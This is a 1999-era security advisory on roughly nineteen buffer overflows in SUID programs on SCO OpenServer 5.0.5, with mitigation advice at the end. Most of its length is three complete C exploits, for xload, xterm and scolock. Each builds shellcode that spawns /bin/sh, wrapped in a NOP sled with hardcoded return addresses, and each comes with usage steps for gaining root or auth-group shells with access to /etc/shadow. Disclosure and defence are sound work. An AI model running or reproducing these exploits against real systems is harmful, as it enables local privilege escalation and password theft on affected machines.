COMMAND
buffer overflows
SYSTEMS AFFECTED
SCO 5.0.5+Skunkware98
PROBLEM
Brock Tellier found the following. After some light security auditing
he found approximately nineteen buffer overflows in various SCO
5.0.5+Skunkware98 programs. This was, by no means, a
comprehensive audit of SCO's su/gids so we can be sure there are
dozens of holes missed. Keep in mind also that this was ONLY
command line buffer overflow testing and did not include
environment, file i/o, or any other sort of overflow. And no
looking around for /tmp races.
Some of these holes are old to the world of security, but
apparently SCO hasn't caught up yet. For instance, anyone
remember the old Xt library holes in xterm and such? Well,
apparently SCO doesn't. Not to mention the fact that in June
someone posted an xterm exploit (though the author didn't make
clear that all programs using the Xt library were probably
vulnerable) and SCO never came out with a fix. Thus this program
as well as all others in the class are still vulnerable.
Following is a list of vulnerable programs and their su/gid
status.
Potential root:
SUID root
1. xload -bg $1492bytes
2. xterm -bg $1492bytes
3. xmcd -bg $1492bytes
Exploit for xload follows (however, it won't work):
/*
* <xloadx.c> Local root exploit
*
* Offset: xload (SCO OpenServer 5.0.4)
* 0 -> From an open scoterm (without display parameter)
* 2000 -> From remote telnet (with display parameter)
*
* Usage:
* $ cc xloadx.c -o xloadx
* $ scoterm
* $ /usr/bin/X11/xload -geometry `xloadx 0`
* or
* $ /usr/bin/X11/xload -display 1.1.1.1:0 -geometry `xloadx 2000`
*
* Note: xload needs to be run from a valid x-display
*
* By: The Dark Raver of CPNE (Murcia/Spain - 22/6/99)
*
* <http://members.tripod.com/~ochodedos> - <doble@iname.com>
*
*/
#include <stdlib.h>
#include <stdio.h>
/*
 * Payload bytes that main() copies into the output buffer at offset 1000.
 * The commented-out listing that follows is the same byte string with a
 * per-instruction annotation.  main() copies strlen(hell) bytes, so the
 * string's own terminating NUL is not part of the output.
 */
char hell[]=
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";
/*
char hell[]=
"\xeb\x1b" // start: jmp uno
"\x5e" // dos: popl %esi
"\x31\xdb" // xorl %ebx,%ebx
"\x89\x5e\x07" // movb %bl,0x7(%esi)
"\x89\x5e\x0c" // movl %ebx,0x0c(%esi)
"\x88\x5e\x11" // movb %bl,0x11(%esi)
"\x31\xc0" // xorl %eax,%eax
"\xb0\x3b" // movb $0x3b,%al
"\x8d\x7e\x07" // leal 0x07(%esi),%edi
"\x89\xf9" // movl %edi,%ecx
"\x53" // pushl %ebx
"\x51" // pushl %ecx
"\x56" // pushl %esi
"\x56" // pushl %esi
"\xeb\x10" // jmp execve
"\xe8\xe0\xff\xff\xff" // uno: call dos
"/bin/sh"
"\xaa\xaa\xaa\xaa"
"\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0
*/
#define OFF 0x80462ff // SCO OpenServer 5.0.4 -- value main() stores repeatedly into buf; release-specific (see "Offset" in the header)
#define ALINEA 3 // "alinea" (Spanish: aligns): shifts where the OFF fill starts (1100+ALINEA)
#define LEN 2000 // size of buf and of the emitted argument, in bytes
int main(int argc, char *argv[]) {
    /*
     * Proof-of-concept driver: writes a LEN-byte argument to stdout.
     * Layout as built below: the whole buffer is first filled with 0x90
     * (the x86 nop opcode), the payload `hell` is copied to offset 1000,
     * and from 1100+ALINEA onward every 4 bytes hold OFF+offset as an int.
     *
     * argv[1] (required): decimal value added to OFF.  When it is missing
     * a usage line is printed and the program exits 0.  Always exits 0.
     *
     * NOTE(review): memset/memcpy/strlen are used without <string.h>, so
     * this relies on implicit declarations, which C99 and later reject.
     */
    int offset=0;
    char buf[LEN];
    int i;
    if(argc < 2) {
        printf("Usage: xloadx <offset>\n");
        exit(0); }
    else {
        offset=atoi(argv[1]); }  /* atoi reports no errors: non-numeric input silently becomes 0 */
    memset(buf,0x90,LEN);  /* 0x90 fill covers everything the two copies below do not overwrite */
    /* strlen: the payload's terminating NUL is not copied, so the fill continues after it */
    memcpy(buf+1000,hell,strlen(hell));
    /* last store starts at i <= LEN-5, so the 4-byte int stays inside buf */
    for(i=1100+ALINEA;i<LEN-4;i+=4)
        *(int *)&buf[i]=OFF+offset;  /* NOTE(review): int store through a char array: misaligned and aliasing, UB in ISO C */
    for(i=0;i<LEN;i++)
        putchar(buf[i]);  /* raw bytes; the header's Usage captures them via shell command substitution */
    exit(0);
}
Here's the one for xterm:
/*
* <xtermx.c> Local root exploit
*
* Offset: xterm (SCO OpenServer 5.0.4)
* 0 -> From an open scoterm (without display parameter)
* 0 -> Openserver 5.0.2 (with display parameter)
* 2000 -> From remote telnet (with display parameter)
*
* Usage:
* $ cc xtermx.c -o xtermx
* $ scoterm
* $ /usr/bin/X11/xterm -bg `xtermx 0`
* or
* $ /usr/bin/X11/xterm -display 1.1.1.1:0 -bg `xtermx 2000`
*
* Note: xterm needs to be run from a valid x-display
*
* By: The Dark Raver of CPNE (Murcia/Spain - 22/6/99)
*
* <http://members.tripod.com/~ochodedos> - <doble@iname.com>
*
*/
#include <stdlib.h>
#include <stdio.h>
/*
 * Payload bytes that main() copies into the output buffer at offset 1000.
 * The commented-out listing that follows is the same byte string with a
 * per-instruction annotation.  main() copies strlen(hell) bytes, so the
 * string's own terminating NUL is not part of the output.
 */
char hell[]=
"\xeb\x1b\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x0c\x88\x5e\x11\x31\xc0"
"\xb0\x3b\x8d\x7e\x07\x89\xf9\x53\x51\x56\x56\xeb\x10\xe8\xe0\xff"
"\xff\xff/bin/sh\xaa\xaa\xaa\xaa\x9a\xaa\xaa\xaa\xaa\x07\xaa";
/*
char hell[]=
"\xeb\x1b" // start: jmp uno
"\x5e" // dos: popl %esi
"\x31\xdb" // xorl %ebx,%ebx
"\x89\x5e\x07" // movb %bl,0x7(%esi)
"\x89\x5e\x0c" // movl %ebx,0x0c(%esi)
"\x88\x5e\x11" // movb %bl,0x11(%esi)
"\x31\xc0" // xorl %eax,%eax
"\xb0\x3b" // movb $0x3b,%al
"\x8d\x7e\x07" // leal 0x07(%esi),%edi
"\x89\xf9" // movl %edi,%ecx
"\x53" // pushl %ebx
"\x51" // pushl %ecx
"\x56" // pushl %esi
"\x56" // pushl %esi
"\xeb\x10" // jmp execve
"\xe8\xe0\xff\xff\xff" // uno: call dos
"/bin/sh"
"\xaa\xaa\xaa\xaa"
"\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0
*/
#define OFF 0x80471ff // SCO OpenServer 5.0.4 -- value main() stores repeatedly into buf; release-specific (see "Offset" in the header)
#define ALINEA 0 // "alinea" (Spanish: aligns): shifts where the OFF fill starts (1100+ALINEA)
#define LEN 2000 // size of buf and of the emitted argument, in bytes
int main(int argc, char *argv[]) {
    /*
     * Proof-of-concept driver: writes a LEN-byte argument to stdout.
     * Layout as built below: the whole buffer is first filled with 0x90
     * (the x86 nop opcode), the payload `hell` is copied to offset 1000,
     * and from 1100+ALINEA onward every 4 bytes hold OFF+offset as an int.
     *
     * argv[1] (required): decimal value added to OFF.  When it is missing
     * a usage line is printed and the program exits 0.  Always exits 0.
     *
     * NOTE(review): memset/memcpy/strlen are used without <string.h>, so
     * this relies on implicit declarations, which C99 and later reject.
     */
    int offset=0;
    char buf[LEN];
    int i;
    if(argc < 2) {
        printf("Usage: xtermx <offset>\n");
        exit(0); }
    else {
        offset=atoi(argv[1]); }  /* atoi reports no errors: non-numeric input silently becomes 0 */
    memset(buf,0x90,LEN);  /* 0x90 fill covers everything the two copies below do not overwrite */
    /* strlen: the payload's terminating NUL is not copied, so the fill continues after it */
    memcpy(buf+1000,hell,strlen(hell));
    /* last store starts at i <= LEN-5, so the 4-byte int stays inside buf */
    for(i=1100+ALINEA;i<LEN-4;i+=4)
        *(int *)&buf[i]=OFF+offset;  /* NOTE(review): int store through a char array: misaligned and aliasing, UB in ISO C */
    for(i=0;i<LEN;i++)
        putchar(buf[i]);  /* raw bytes; the header's Usage captures them via shell command substitution */
    exit(0);
}
SUID auth (Auth has rw access to /etc/shadow)
4. xlock -bg $1492bytes
5. xscreensaver -bg $1492bytes
6. scolock -bg $1492bytes
Now, here's the scolock exploit:
/*
* <scolockx.c> Local exploit - Gives you an auth group suid shell
*
* h0h0h0!! auth group has read/write access to /etc/shadow (w3 4r3 r00t!)
*
* $ ls -al /etc/shadow
* -rw-rw---- 1 root auth 323 Jun 14 23:09 /etc/shadow
*
* Offset: scolockx (SCO OpenServer 5.0.4)
* 0 -> with -display parameter
*
* Usage:
* $ cc scolockx.c -o scolockx
* $ /usr/bin/X11/scolock -display 1.1.1.1:0 -bg `scolockx 0`
*
* Note: scolock needs to be run from a valid x-display
*
* By: The Dark Raver of CPNE (Murcia/Spain - 28/6/99)
*
* <http://members.tripod.com/~ochodedos> - <doble@iname.com>
*
*/
#include <stdlib.h>
#include <stdio.h>
/*
 * Payload bytes that main() copies into the output buffer at offset 1000,
 * annotated per instruction on the right.  main() copies strlen(hell)
 * bytes, so the string's own terminating NUL is not part of the output.
 */
char hell[]=
"\xeb\x16" // start: jmp uno
"\x5e" // dos: popl %esi
"\x31\xdb" // xorl %ebx,%ebx
"\x89\x5e\x07" // movb %bl,0x7(%esi)
"\x89\x5e\x0c" // movl %ebx,0x0c(%esi)
"\x88\x5e\x11" // movb %bl,0x11(%esi)
"\x31\xc0" // xorl %eax,%eax
"\xb0\x3b" // movb $0x3b,%al
"\x53" // pushl %ebx
"\x53" // pushl %ebx
"\x56" // pushl %esi
"\x56" // pushl %esi
"\xeb\x10" // jmp execve
"\xe8\xe5\xff\xff\xff" // uno: call dos
"/bin/sh"
"\xaa\xaa\xaa\xaa"
"\x9a\xaa\xaa\xaa\xaa\x07\xaa"; // execve: lcall 0x7,0x0
#define OFF 0x8047a98 // SCO OpenServer 5.0.4 -- value main() stores repeatedly into buf; release-specific (see "Offset" in the header)
#define ALINEA 0 // "alinea" (Spanish: aligns): shifts where the OFF fill starts (1100+ALINEA)
#define LEN 2000 // size of buf and of the emitted argument, in bytes
int main(int argc, char *argv[]) {
    /*
     * Proof-of-concept driver: writes a LEN-byte argument to stdout.
     * Layout as built below: the whole buffer is first filled with 0x90
     * (the x86 nop opcode), the payload `hell` is copied to offset 1000,
     * and from 1100+ALINEA onward every 4 bytes hold OFF+offset as an int.
     *
     * argv[1] (required): decimal value added to OFF.  When it is missing
     * a usage line is printed and the program exits 0.  Always exits 0.
     *
     * NOTE(review): memset/memcpy/strlen are used without <string.h>, so
     * this relies on implicit declarations, which C99 and later reject.
     */
    int offset=0;
    char buf[LEN];
    int i;
    if(argc < 2) {
        printf("Usage: scolockx <offset>\n");
        exit(0); }
    else {
        offset=atoi(argv[1]); }  /* atoi reports no errors: non-numeric input silently becomes 0 */
    memset(buf,0x90,LEN);  /* 0x90 fill covers everything the two copies below do not overwrite */
    /* strlen: the payload's terminating NUL is not copied, so the fill continues after it */
    memcpy(buf+1000,hell,strlen(hell));
    /* last store starts at i <= LEN-5, so the 4-byte int stays inside buf */
    for(i=1100+ALINEA;i<LEN-4;i+=4)
        *(int *)&buf[i]=OFF+offset;  /* NOTE(review): int store through a char array: misaligned and aliasing, UB in ISO C */
    for(i=0;i<LEN;i++)
        putchar(buf[i]);  /* raw bytes; the header's Usage captures them via shell command substitution */
    exit(0);
}
SUID mem (strings /dev/kmem)
7. sar -o $2105bytes or sar -f $1077bytes x
Potential lp:
SUID lp
8. cancel $998bytes (isn't this one old too?)
9. lp $10000bytes (didn't get the exact number)
10. reject $10000bytes (as above)
Potential bin:
SUID bin
11. sd $1017bytes (SIGSEGV @1017 SIGTERM 1 to 1017bytes)
Potential annoyance:
SUID dos
12. doscat $19031bytes
13. doscp "" x
14. dosdir ""
15. dosls ""
16. dosmkdir ""
17. dosrm ""
18. dosrmdir ""
SUID uucp
19. ati $40bytes
SOLUTION
For most of these programs, you're going to have to suffer with
some broken functionality when you remove the s-bits. The various
suid root and auth programs won't be able to function without their
su/gid status. However, you could make a new group such as xusers and
have these programs only executable by its members. In fact
adding trusted users to the lp group is probably the best way to
overcome these lp vulnerabilities as well.
SCO will have a patch for OpenServer 5.0.5 in two weeks, which
will be available from
http://www.sco.com/security/